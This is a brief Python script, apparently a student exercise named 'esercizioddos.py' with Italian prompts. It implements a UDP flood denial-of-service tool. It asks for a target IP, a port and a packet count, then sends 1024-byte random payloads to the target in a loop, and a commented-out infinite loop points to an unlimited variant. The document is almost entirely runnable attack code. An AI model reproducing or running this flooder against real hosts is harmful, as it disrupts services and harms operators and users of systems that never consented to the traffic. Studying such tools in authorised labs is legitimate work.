

```
• esercizioddos.py X
• esercizioddos.py > ...
1  ✓ import random
2   import socket
3
4  ✓ def UDP_flood():
5    |   dati_da_inviare = random._urandom(1024)
6    #   while true:
7    |   for x in range (numero_pacchetti):
8    |       s.sendto(dati_da_inviare, target)
9    |       print ("#",x,"- UDP inviato\n")
10
11   indirizzo_ip = str(input("inserisci l'indirizzo IP Target"))
12   port = int(input("Inserisci la porta:"))
13   numero_pacchetti = int(input("Inserisci il numero di pacchetti da inviare:"))
14
15  ✓ try:
16    |   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
17    |   target = (str(indirizzo_ip),int(port))
18
19  ✓ except:
20    |   s.close()
21    |   print("[!] Error!!!")
22
23   UDP_flood()
```